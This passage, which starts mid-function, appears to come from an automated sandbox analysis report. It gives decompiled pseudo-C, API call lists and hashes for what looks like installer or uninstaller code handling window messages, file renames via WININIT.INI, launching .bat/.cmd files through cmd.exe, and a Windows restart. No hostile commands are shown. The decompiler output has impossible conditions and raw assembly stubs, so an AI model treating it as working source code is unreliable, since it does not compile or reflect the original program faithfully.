                                                            							__eflags =  *_t65;
                                                            							if( *_t65 == 0) {
                                                            								E00429008(L"Cannot evaluate variable because [Code] isn\'t running yet", 1);
                                                            								E004098C4();
                                                            							}
                                                            							E0040A998( &_v172, 0x80,  &_v144, 0);
                                                            							_t71 =  *0x6cdb4c; // 0x6d682c
                                                            							E006A3E88( *_t71, _t122, _v156, _t178, _t179, _t189,  &_v12, _v172, _v148);
                                                            							_v16[3] = 1;
                                                            							_pop(_t162);
                                                            							 *[fs:eax] = _t162;
                                                            							_t163 =  *0x6d62f8; // 0x0
                                                            							_t77 =  *0x6d62f4; // 0x0
                                                            							E005D6064(_t77, _t122, _t163, _t178, _t179, _v12);
                                                            							_pop(_t164);
                                                            							 *[fs:eax] = _t164;
                                                            						} else {
                                                            							_t169 = _t157 - 1;
                                                            							__eflags = _t169;
                                                            							if(_t169 == 0) {
                                                            								_push(_t181);
                                                            								_push(0x615bb7);
                                                            								_push( *[fs:edx]);
                                                            								 *[fs:edx] = _t183;
                                                            								E0040A1EC(0x6d62e8);
                                                            								E0040A3A4(0x6d62e8,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
                                                            								_v16[3] = 1;
                                                            								_pop(_t172);
                                                            								 *[fs:eax] = _t172;
                                                            							} else {
                                                            								__eflags = _t169 == 1;
                                                            								if(_t169 == 1) {
                                                            									_push(_t181);
                                                            									_push(0x615c0a);
                                                            									_push( *[fs:edx]);
                                                            									 *[fs:edx] = _t183;
                                                            									E0040A1EC(0x6d62ec);
                                                            									E0040A3A4(0x6d62ec,  *(_v16[2] + 4) >> 0,  *((intOrPtr*)(_v16[2] + 8)), __eflags, 0);
                                                            									_v16[3] = 1;
                                                            									_pop(_t176);
                                                            									 *[fs:eax] = _t176;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L21;
                                                            					}
                                                            				} else {
                                                            					_t104 = _t51 - 0xbb6;
                                                            					if(_t104 == 0) {
                                                            						 *0x6d62e4 = 0;
                                                            						 *0x6d62f4 = 0;
                                                            						 *0x6d62fc = 1;
                                                            						 *0x6d62fd = 0;
                                                            						PostMessageW(0, 0, 0, 0);
                                                            					} else {
                                                            						_t107 = _t104 - 1;
                                                            						if(_t107 == 0) {
                                                            							 *0x6d62fc = 1;
                                                            							_t108 = _v16;
                                                            							__eflags =  *((intOrPtr*)(_t108 + 4)) - 1;
                                                            							 *0x6d62fd =  *((intOrPtr*)(_t108 + 4)) == 1;
                                                            							PostMessageW(0, 0, 0, 0);
                                                            						} else {
                                                            							if(_t107 == 2) {
                                                            								SetForegroundWindow(_v16[1]);
                                                            							} else {
                                                            								_t118 =  *0x6d62f8; // 0x0
                                                            								_v16[3] = DefWindowProcW(_t118, _t122, _v16[1], _v16[2]);
                                                            							}
                                                            						}
                                                            					}
                                                            					L21:
                                                            					_pop(_t165);
                                                            					 *[fs:eax] = _t165;
                                                            					_pop(_t166);
                                                            					 *[fs:eax] = _t166;
                                                            					_push(E00615C85);
                                                            					E0040A1EC( &_v172);
                                                            					return E0040A228( &_v12, 2);
                                                            				}
                                                            			}







































                                                            APIs
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                            • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                            • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessagePostWindow$ForegroundProc
                                                            • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                            • API String ID: 602442252-4088602279
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E0060D8B0(char __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				char _v41;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				char _v60;
                                                            				char _v64;
                                                            				char _v68;
                                                            				char _v72;
                                                            				void* __ecx;
                                                            				char _t90;
                                                            				char _t167;
                                                            				char _t168;
                                                            				intOrPtr _t171;
                                                            				intOrPtr _t179;
                                                            				intOrPtr _t186;
                                                            				intOrPtr _t207;
                                                            				intOrPtr _t217;
                                                            				intOrPtr _t218;
                                                            
                                                            				_t215 = __esi;
                                                            				_t214 = __edi;
                                                            				_t217 = _t218;
                                                            				_t171 = 8;
                                                            				goto L1;
                                                            				L4:
                                                            				if(E005C77E8() != 0) {
                                                            					__eflags = _t167;
                                                            					if(__eflags == 0) {
                                                            						E0060D650(_v8, _t167,  &_v68, _t214, _t215, __eflags);
                                                            						E0040A5F0( &_v8, _v68);
                                                            						__eflags = _v12;
                                                            						if(__eflags != 0) {
                                                            							E0060D650(_v12, _t167,  &_v72, _t214, _t215, __eflags);
                                                            							E0040A5F0( &_v12, _v72);
                                                            						}
                                                            					}
                                                            					_t90 = E0060C558(_t167, _v12, _v8, 5);
                                                            					__eflags = _t90;
                                                            					if(_t90 == 0) {
                                                            						E0060CE84(L"MoveFileEx");
                                                            					}
                                                            					__eflags = 0;
                                                            					_pop(_t186);
                                                            					 *[fs:eax] = _t186;
                                                            					_push(E0060DBD9);
                                                            					E0040A228( &_v72, 7);
                                                            					return E0040A228( &_v32, 7);
                                                            				} else {
                                                            					E005C7430( &_v16);
                                                            					E005C4EA4(_v16,  &_v56);
                                                            					E0040B4C8( &_v20, L"WININIT.INI", _v56);
                                                            					E0060D294(0, _t167, L".tmp", _v16, _t214, _t215,  &_v24);
                                                            					_push(_t217);
                                                            					_push(0x60db3e);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t218;
                                                            					_v36 = 0;
                                                            					_v40 = 0;
                                                            					_push(_t217);
                                                            					_push(0x60dae2);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t218;
                                                            					WritePrivateProfileStringW(0, 0, 0, E0040B278(_v20));
                                                            					_v36 = E005CBFB8(1, 1, 0, 3);
                                                            					_t179 = _v24;
                                                            					_v40 = E005CBFB8(1, 0, 1, 0);
                                                            					_v41 = 0;
                                                            					_t168 = 0;
                                                            					while(E005CC258(_v36) == 0) {
                                                            						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
                                                            						E004225EC(_v28, 1,  &_v32, _t215);
                                                            						__eflags = _v32;
                                                            						if(__eflags == 0) {
                                                            							L11:
                                                            							E005CC5A0(_v40, 1, _v28, _t215, __eflags);
                                                            							_t168 = 0;
                                                            							__eflags = 0;
                                                            							continue;
                                                            						} else {
                                                            							__eflags =  *_v32 - 0x5b;
                                                            							if(__eflags != 0) {
                                                            								goto L11;
                                                            							} else {
                                                            								__eflags = E00422368(_v32, _t179, L"[rename]");
                                                            								if(__eflags != 0) {
                                                            									__eflags = _v41;
                                                            									if(__eflags == 0) {
                                                            										goto L11;
                                                            									}
                                                            								} else {
                                                            									_v41 = 1;
                                                            									goto L11;
                                                            								}
                                                            							}
                                                            						}
                                                            						break;
                                                            					}
                                                            					_t223 = _v41;
                                                            					if(_v41 == 0) {
                                                            						E005CC5A0(_v40, _t168, L"[rename]", _t215, _t223);
                                                            					}
                                                            					_t224 = _v12;
                                                            					if(_v12 == 0) {
                                                            						E0040A5F0( &_v32, 0x60dc48);
                                                            					} else {
                                                            						E005C73D8(_v12, _t179,  &_v32, _t224);
                                                            					}
                                                            					_push(_v32);
                                                            					_push(0x60dc5c);
                                                            					E005C73D8(_v8, _t179,  &_v64, _t224);
                                                            					_push(_v64);
                                                            					E0040B550( &_v60, _t168, 3, _t214, _t215);
                                                            					E005CC5A0(_v40, _t168, _v60, _t215, _t224);
                                                            					_t225 = _t168;
                                                            					if(_t168 != 0) {
                                                            						E005CC5A0(_v40, _t168, _v28, _t215, _t225);
                                                            					}
                                                            					while(E005CC258(_v36) == 0) {
                                                            						E005CC268(_v36, _t168,  &_v28, _t214, _t215, __eflags);
                                                            						E005CC5A0(_v40, _t168, _v28, _t215, __eflags);
                                                            					}
                                                            					_pop(_t207);
                                                            					 *[fs:eax] = _t207;
                                                            					_push(E0060DAE9);
                                                            					E00408444(_v40);
                                                            					return E00408444(_v36);
                                                            				}
                                                            				L1:
                                                            				_push(0);
                                                            				_push(0);
                                                            				_t171 = _t171 - 1;
                                                            				if(_t171 != 0) {
                                                            					goto L1;
                                                            				} else {
                                                            					_t1 =  &_v8;
                                                            					 *_t1 = _t171;
                                                            					_push(__esi);
                                                            					_push(__edi);
                                                            					_v12 =  *_t1;
                                                            					_v8 = __edx;
                                                            					_t167 = __eax;
                                                            					E0040A2AC(_v8);
                                                            					E0040A2AC(_v12);
                                                            					_push(_t217);
                                                            					_push(0x60dbd2);
                                                            					 *[fs:eax] = _t218;
                                                            					E005C52C8(_v8,  &_v48, _t217,  *[fs:eax]);
                                                            					E0040A5F0( &_v8, _v48);
                                                            					if(_v12 != 0) {
                                                            						E005C52C8(_v12,  &_v52, _t217);
                                                            						E0040A5F0( &_v12, _v52);
                                                            					}
                                                            				}
                                                            				goto L4;
                                                            			}






























                                                            0x0060dab3
                                                            0x0060dab3
                                                            0x0060dac6
                                                            0x0060dac9
                                                            0x0060dacc
                                                            0x0060dad4
                                                            0x0060dae1
                                                            0x0060dae1
                                                            0x0060d8b9
                                                            0x0060d8b9
                                                            0x0060d8bb
                                                            0x0060d8bd
                                                            0x0060d8be
                                                            0x00000000
                                                            0x0060d8c0
                                                            0x0060d8c0
                                                            0x0060d8c0
                                                            0x0060d8c4
                                                            0x0060d8c5
                                                            0x0060d8c6
                                                            0x0060d8c9
                                                            0x0060d8cc
                                                            0x0060d8d1
                                                            0x0060d8d9
                                                            0x0060d8e0
                                                            0x0060d8e1
                                                            0x0060d8e9
                                                            0x0060d8f2
                                                            0x0060d8fd
                                                            0x0060d906
                                                            0x0060d90e
                                                            0x0060d919
                                                            0x0060d919
                                                            0x0060d906
                                                            0x00000000

                                                            APIs
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                            • API String ID: 390214022-3304407042
                                                            • Opcode ID: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
                                                            • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                            • Opcode Fuzzy Hash: 1516e58ba1303ba12e62d3941270339ebbfe120b0d1e0e5f83981064806d38df
                                                            • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E0060F06C(signed char __eax, void* __ebx, char __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, void* _a8, signed short _a12, signed char _a16, char _a20) {
                                                            				char _v8;
                                                            				signed char _v9;
                                                            				short _v32;
                                                            				intOrPtr _v36;
                                                            				char _v80;
                                                            				void* _v92;
                                                            				char _v96;
                                                            				char _v100;
                                                            				char _v104;
                                                            				char _v108;
                                                            				char _v112;
                                                            				char _v116;
                                                            				char _v120;
                                                            				intOrPtr _t63;
                                                            				intOrPtr _t64;
                                                            				void* _t75;
                                                            				intOrPtr _t107;
                                                            				char _t114;
                                                            				intOrPtr _t132;
                                                            				void* _t142;
                                                            				intOrPtr* _t144;
                                                            				void* _t147;
                                                            
                                                            				_t116 = __ecx;
                                                            				_v116 = 0;
                                                            				_v120 = 0;
                                                            				_v108 = 0;
                                                            				_v112 = 0;
                                                            				_v104 = 0;
                                                            				_v100 = 0;
                                                            				_v8 = 0;
                                                            				_t114 = __ecx;
                                                            				_t142 = __edx;
                                                            				_v9 = __eax;
                                                            				_t144 = _a4;
                                                            				E0040A2AC(_a20);
                                                            				_push(_t147);
                                                            				_push(0x60f26e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t147 + 0xffffff8c;
                                                            				E0040B660(_t142, 0x60f28c);
                                                            				if(0 != 0) {
                                                            					_push(0x60f29c);
                                                            					_push(_t142);
                                                            					_push(0x60f29c);
                                                            					E0040B550( &_v8, _t114, 3, _t142, _t144);
                                                            					__eflags = _t114;
                                                            					if(_t114 != 0) {
                                                            						_push(_v8);
                                                            						_push(0x60f2ac);
                                                            						_push(_t114);
                                                            						E0040B550( &_v8, _t114, 3, _t142, _t144);
                                                            					}
                                                            					E005C53D0(_t142,  &_v100);
                                                            					_t63 = E00422368(_v100, _t116, L".bat");
                                                            					__eflags = _t63;
                                                            					if(_t63 == 0) {
                                                            						L6:
                                                            						_t64 = E005C77E8();
                                                            						__eflags = _t64;
                                                            						if(_t64 == 0) {
                                                            							_push(0x60f29c);
                                                            							E005C7430( &_v120);
                                                            							E005C4EA4(_v120,  &_v116);
                                                            							_push(_v116);
                                                            							_push(L"COMMAND.COM\" /C ");
                                                            							_push(_v8);
                                                            							E0040B550( &_v8, _t114, 4, _t142, _t144);
                                                            						} else {
                                                            							_push(0x60f29c);
                                                            							E005C745C( &_v112);
                                                            							E005C4EA4(_v112,  &_v108);
                                                            							_push(_v108);
                                                            							_push(L"cmd.exe\" /C \"");
                                                            							_push(_v8);
                                                            							_push(0x60f29c);
                                                            							E0040B550( &_v8, _t114, 5, _t142, _t144);
                                                            						}
                                                            						goto L9;
                                                            					} else {
                                                            						E005C53D0(_t142,  &_v104);
                                                            						_t107 = E00422368(_v104, _t116, L".cmd");
                                                            						__eflags = _t107;
                                                            						if(_t107 != 0) {
                                                            							L9:
                                                            							__eflags = _a20;
                                                            							if(_a20 == 0) {
                                                            								E005C5378(_t142, _t116,  &_a20);
                                                            							}
                                                            							goto L11;
                                                            						}
                                                            						goto L6;
                                                            					}
                                                            				} else {
                                                            					E0040A5F0( &_v8, _t114);
                                                            					L11:
                                                            					E00407760( &_v80, 0x44);
                                                            					_v80 = 0x44;
                                                            					_v36 = 1;
                                                            					_v32 = _a12 & 0x0000ffff;
                                                            					_t150 = _a20;
                                                            					if(_a20 == 0) {
                                                            						E005C745C( &_a20);
                                                            					}
                                                            					_t75 = E0040B278(_a20);
                                                            					E0060C038(_v9 & 0x000000ff, E0040B278(_v8), 0, _t150,  &_v96,  &_v80, _t75, 0, 0x4000000, 0, 0, 0);
                                                            					asm("sbb ebx, ebx");
                                                            					_t115 = _t114 + 1;
                                                            					if(_t114 + 1 != 0) {
                                                            						CloseHandle(_v92);
                                                            						E0060EFD8(_v96, _t115, _a16 & 0x000000ff, _t142, _t144, _t144);
                                                            					} else {
                                                            						 *_t144 = GetLastError();
                                                            					}
                                                            					_pop(_t132);
                                                            					 *[fs:eax] = _t132;
                                                            					_push(E0060F275);
                                                            					E0040A228( &_v120, 6);
                                                            					E0040A1C8( &_v8);
                                                            					return E0040A1C8( &_a20);
                                                            				}
                                                            			}


























                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C,00000000), ref: 0060F221
                                                            • CloseHandle.KERNEL32(006B7E1B,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C), ref: 0060F22E
                                                              • Part of subcall function 0060EFD8: WaitForInputIdle.USER32 ref: 0060F004
                                                              • Part of subcall function 0060EFD8: MsgWaitForMultipleObjects.USER32 ref: 0060F026
                                                              • Part of subcall function 0060EFD8: GetExitCodeProcess.KERNEL32 ref: 0060F037
                                                              • Part of subcall function 0060EFD8: CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                            • API String ID: 854858120-615399546
                                                            • Opcode ID: 302ca1a099cb30e81fc891af75844f8b62dda31169773e0edeec6a06f46f331e
                                                            • Instruction ID: 0730013a778409a59d543d7128fc9cae65caf948aa4e6a3f37707057903c9a02
                                                            • Opcode Fuzzy Hash: 302ca1a099cb30e81fc891af75844f8b62dda31169773e0edeec6a06f46f331e
                                                            • Instruction Fuzzy Hash: 69512134A8030DABDB14EFE5C892ADEBBBAFF44304F60447AB404A76C1D7749E059B95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00408E18(signed char* __eax, void* __edx, void* __eflags) {
                                                            				void* _t49;
                                                            				signed char _t56;
                                                            				intOrPtr _t57;
                                                            				signed char _t59;
                                                            				void* _t70;
                                                            				signed char* _t71;
                                                            				intOrPtr _t72;
                                                            				signed char* _t73;
                                                            
                                                            				_t70 = __edx;
                                                            				_t71 = __eax;
                                                            				_t72 =  *((intOrPtr*)(__eax + 0x10));
                                                            				while(1) {
                                                            					L1:
                                                            					 *_t73 = E004092D8(_t71);
                                                            					if( *_t73 != 0 || _t70 == 0) {
                                                            						break;
                                                            					}
                                                            					_t73[1] = 0;
                                                            					if(_t72 <= 0) {
                                                            						while(1) {
                                                            							L17:
                                                            							_t56 =  *_t71;
                                                            							if(_t56 == 0) {
                                                            								goto L1;
                                                            							}
                                                            							asm("lock cmpxchg [esi], edx");
                                                            							if(_t56 != _t56) {
                                                            								continue;
                                                            							} else {
                                                            								goto L19;
                                                            							}
                                                            							do {
                                                            								L19:
                                                            								_t73[4] = GetTickCount();
                                                            								E0040901C(_t71);
                                                            								_t57 =  *0x6cf8fc; // 0x6c76d4
                                                            								 *((intOrPtr*)(_t57 + 0x10))();
                                                            								 *_t73 = 0 == 0;
                                                            								if(_t70 != 0xffffffff) {
                                                            									_t73[8] = GetTickCount();
                                                            									if(_t70 <= _t73[8] - _t73[4]) {
                                                            										_t70 = 0;
                                                            									} else {
                                                            										_t70 = _t70 - _t73[8] - _t73[4];
                                                            									}
                                                            								}
                                                            								if( *_t73 == 0) {
                                                            									do {
                                                            										asm("lock cmpxchg [esi], edx");
                                                            									} while ( *_t71 !=  *_t71);
                                                            									_t73[1] = 1;
                                                            								} else {
                                                            									while(1) {
                                                            										_t59 =  *_t71;
                                                            										if((_t59 & 0x00000001) != 0) {
                                                            											goto L29;
                                                            										}
                                                            										asm("lock cmpxchg [esi], edx");
                                                            										if(_t59 != _t59) {
                                                            											continue;
                                                            										}
                                                            										_t73[1] = 1;
                                                            										goto L29;
                                                            									}
                                                            								}
                                                            								L29:
                                                            							} while (_t73[1] == 0);
                                                            							if( *_t73 != 0) {
                                                            								_t71[8] = GetCurrentThreadId();
                                                            								_t71[4] = 1;
                                                            							}
                                                            							goto L32;
                                                            						}
                                                            						continue;
                                                            					}
                                                            					_t73[4] = GetTickCount();
                                                            					_t73[0xc] = 0;
                                                            					if(_t72 <= 0) {
                                                            						L13:
                                                            						if(_t70 == 0xffffffff) {
                                                            							goto L17;
                                                            						}
                                                            						_t73[8] = GetTickCount();
                                                            						_t49 = _t73[8] - _t73[4];
                                                            						if(_t70 > _t49) {
                                                            							_t70 = _t70 - _t49;
                                                            							goto L17;
                                                            						}
                                                            						 *_t73 = 0;
                                                            						break;
                                                            					}
                                                            					L5:
                                                            					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
                                                            						goto L8;
                                                            					} else {
                                                            						 *_t73 = 0;
                                                            					}
                                                            					break;
                                                            					L8:
                                                            					if( *_t71 > 1) {
                                                            						goto L13;
                                                            					}
                                                            					if( *_t71 != 0) {
                                                            						L12:
                                                            						E00408AF8( &(_t73[0xc]));
                                                            						_t72 = _t72 - 1;
                                                            						if(_t72 > 0) {
                                                            							goto L5;
                                                            						}
                                                            						goto L13;
                                                            					}
                                                            					asm("lock cmpxchg [esi], edx");
                                                            					if(0 != 0) {
                                                            						goto L12;
                                                            					}
                                                            					_t71[8] = GetCurrentThreadId();
                                                            					_t71[4] = 1;
                                                            					 *_t73 = 1;
                                                            					break;
                                                            				}
                                                            				L32:
                                                            				return  *_t73 & 0x000000ff;
                                                            			}












                                                            APIs
                                                              • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                            • GetTickCount.KERNEL32 ref: 00408E4F
                                                            • GetTickCount.KERNEL32 ref: 00408E67
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                            • GetTickCount.KERNEL32 ref: 00408EC1
                                                            • GetTickCount.KERNEL32 ref: 00408EF8
                                                            • GetTickCount.KERNEL32 ref: 00408F22
                                                            • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction ID: 216a2c916ba6e2f13aacbc2b486a5202febe2ca6ab096472d485461ede499aa8
                                                            • Opcode Fuzzy Hash: 20bc9faa338205b9676b9ce63f6a6fc95d4e340ef3c4d15d54fbfb65282f0910
                                                            • Instruction Fuzzy Hash: FD4171712087429ED721AF78CA4031FBAD2AF94354F15897EE4D9D72C2DB7C9881874A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 79%
                                                            			E006A5F04(void* __eax, void* __edx, intOrPtr _a4076) {
                                                            				char _v4120;
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				void* __ebp;
                                                            				void* _t6;
                                                            				void* _t11;
                                                            				signed char _t14;
                                                            				void* _t22;
                                                            				intOrPtr* _t23;
                                                            				void* _t24;
                                                            				void* _t28;
                                                            				long _t30;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				void* _t33;
                                                            
                                                            				_push(__eax);
                                                            				_t6 = 2;
                                                            				do {
                                                            					_t32 = _t32 + 0xfffff004;
                                                            					_push(_t6);
                                                            					_t6 = _t6 - 1;
                                                            				} while (_t6 != 0);
                                                            				_t33 = _t32 + 4;
                                                            				_t28 = __edx;
                                                            				_t29 = _a4076;
                                                            				_t23 = E00414020(_t22, _a4076, GetModuleHandleW(L"kernel32.dll"), L"GetFinalPathNameByHandleW");
                                                            				if(_t23 == 0) {
                                                            					L11:
                                                            					_t11 = E0040A5A8(_t28, _t29);
                                                            				} else {
                                                            					_t14 = GetFileAttributesW(E0040B278(_t29));
                                                            					if(_t14 == 0xffffffff) {
                                                            						goto L11;
                                                            					} else {
                                                            						if((_t14 & 0x00000010) == 0) {
                                                            							_t30 = 0;
                                                            							__eflags = 0;
                                                            						} else {
                                                            							_t30 = 0x2000000;
                                                            						}
                                                            						_t31 = CreateFileW(E0040B278(_t29), 0, 7, 0, 3, _t30, 0);
                                                            						if(_t31 == 0xffffffff) {
                                                            							goto L11;
                                                            						} else {
                                                            							_t24 =  *_t23(_t31,  &_v4120, 0x1000, 0);
                                                            							CloseHandle(_t31);
                                                            							if(_t24 <= 0) {
                                                            								goto L11;
                                                            							} else {
                                                            								_t41 = _t24 - 0xff0;
                                                            								if(_t24 >= 0xff0) {
                                                            									goto L11;
                                                            								} else {
                                                            									_t11 = E006A5E1C(_t33, _t24, _t28, _t29, _t41);
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t11;
                                                            			}



















                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F30
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F49
                                                            • CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A5F73
                                                            • CloseHandle.KERNEL32(00000000), ref: 006A5F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: FileHandle$AttributesCloseCreateModule
                                                            • String ID: GetFinalPathNameByHandleW$kernel32.dll
                                                            • API String ID: 791737717-340263132
                                                            • Opcode ID: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
                                                            • Instruction ID: 33e75e3eedf917459a19461fb92274fc6dcf6f547d9e1cd84d4496d1484fa6be
                                                            • Opcode Fuzzy Hash: ee2239582e227f58055d6c75fc8972661dcf133dd665b7ba8432f605ab2c3931
                                                            • Instruction Fuzzy Hash: FD110860740B043FE530B17A5C8BFBB204E8B96769F14013ABB1ADA3C2E9799D410D9A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 36%
                                                            			E00408BB4(void* __edx) {
                                                            				signed int _v8;
                                                            				intOrPtr _v12;
                                                            				char _v16;
                                                            				char* _t23;
                                                            				intOrPtr _t29;
                                                            				intOrPtr _t39;
                                                            				void* _t41;
                                                            				void* _t43;
                                                            				intOrPtr _t44;
                                                            
                                                            				_t41 = _t43;
                                                            				_t44 = _t43 + 0xfffffff4;
                                                            				_v16 = 0;
                                                            				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
                                                            					L10:
                                                            					_v8 = 0x40;
                                                            					goto L11;
                                                            				} else {
                                                            					_t23 =  &_v16;
                                                            					_push(_t23);
                                                            					_push(0);
                                                            					L00405324();
                                                            					if(_t23 != 0 || GetLastError() != 0x7a) {
                                                            						goto L10;
                                                            					} else {
                                                            						_v12 = E00406F0C(_v16);
                                                            						_push(_t41);
                                                            						_push(E00408C62);
                                                            						_push( *[fs:edx]);
                                                            						 *[fs:edx] = _t44;
                                                            						_push( &_v16);
                                                            						_push(_v12);
                                                            						L00405324();
                                                            						_t29 = _v12;
                                                            						if(_v16 <= 0) {
                                                            							L8:
                                                            							_pop(_t39);
                                                            							 *[fs:eax] = _t39;
                                                            							_push(E00408C69);
                                                            							return E00406F28(_v12);
                                                            						} else {
                                                            							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
                                                            								_t29 = _t29 + 0x18;
                                                            								_v16 = _v16 - 0x18;
                                                            								if(_v16 > 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L8;
                                                            								}
                                                            								goto L12;
                                                            							}
                                                            							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
                                                            							E004099B8();
                                                            							L11:
                                                            							return _v8;
                                                            						}
                                                            					}
                                                            				}
                                                            				L12:
                                                            			}













                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408BC9
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408BCF
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00408BEB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction ID: fae384035c4cbf403bb6e842233c038de7d928fc1d1ef8a2a4529768a9174d83
                                                            • Opcode Fuzzy Hash: d2b5bb259a4a67909b9857f382d53dc443368d34a06db9e148c60c099e14fc22
                                                            • Instruction Fuzzy Hash: E4117570D05208AEEF10EBA5DA45A6EB7F4DB44704F1084BFE454B72C1DF7D8A548B29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E006B8141(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char* _t18;
                                                            				char* _t23;
                                                            				intOrPtr* _t25;
                                                            				intOrPtr _t29;
                                                            				intOrPtr _t32;
                                                            				void* _t34;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t44;
                                                            				void* _t45;
                                                            				void* _t48;
                                                            
                                                            				if( *((char*)(_t48 - 0x21)) != 0) {
                                                            					_t18 =  *0x6cdfdc; // 0x6d62e4
                                                            					if( *_t18 != 0) {
                                                            						E00616130(L"Not restarting Windows because Uninstall is being run from the debugger.", __ebx, __edi, __esi);
                                                            					} else {
                                                            						E00616130(L"Restarting Windows.", __ebx, __edi, __esi);
                                                            						_t23 =  *0x6cdefc; // 0x6d6825
                                                            						 *_t23 = 1;
                                                            						if(E0060F6D8() == 0) {
                                                            							_t25 =  *0x6cdec4; // 0x6d579c
                                                            							SetForegroundWindow( *( *_t25 + 0x188));
                                                            							_push(1);
                                                            							_push(1);
                                                            							_t29 =  *0x6cded8; // 0x6d5c28
